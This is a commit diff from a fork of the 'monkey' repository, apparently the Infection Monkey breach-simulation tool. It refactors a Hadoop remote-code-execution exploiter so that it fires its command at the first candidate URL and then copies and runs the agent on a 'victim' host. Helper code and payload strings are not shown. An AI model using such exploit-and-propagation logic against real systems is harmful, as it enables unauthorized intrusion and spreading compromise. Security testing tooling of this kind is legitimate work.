forked from p34709852/monkey
Agent: Remove adding vulnerable urls in Hadoop
Adding vulnerable ulrs causes check to see if the target is exploitable which calls self.exploit
This commit is contained in:
parent
c02d43556a
commit
25073be9f3
|
@ -51,11 +51,13 @@ class HadoopExploiter(WebRCE):
|
|||
super(HadoopExploiter, self).__init__()
|
||||
|
||||
def _exploit_host(self):
|
||||
# Try to get exploitable url
|
||||
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
||||
self.add_vulnerable_urls(urls, True)
|
||||
if not self.vulnerable_urls:
|
||||
self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}"
|
||||
# Try to get potential urls
|
||||
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
||||
if not potential_urls:
|
||||
self.exploit_result.error_message = (
|
||||
f"No potential exploitable urls has been found for {self.host}"
|
||||
)
|
||||
self._publish_exploitation_event(False, error_message=self.exploit_result.error_message)
|
||||
return self.exploit_result
|
||||
|
||||
monkey_path_on_victim = get_agent_dst_path(self.host)
|
||||
|
@ -65,18 +67,12 @@ class HadoopExploiter(WebRCE):
|
|||
)
|
||||
|
||||
command = self._build_command(monkey_path_on_victim, http_path)
|
||||
timestamp = time()
|
||||
try:
|
||||
|
||||
if self.exploit(self.vulnerable_urls[0], command):
|
||||
if self.exploit(potential_urls[0], command):
|
||||
self.add_executed_cmd(command)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.exploit_result.propagation_success = True
|
||||
|
||||
except requests.RequestException as err:
|
||||
error_message = str(err)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
self._publish_propagation_event(timestamp, False, error_message=error_message)
|
||||
finally:
|
||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
|
Loading…
Reference in New Issue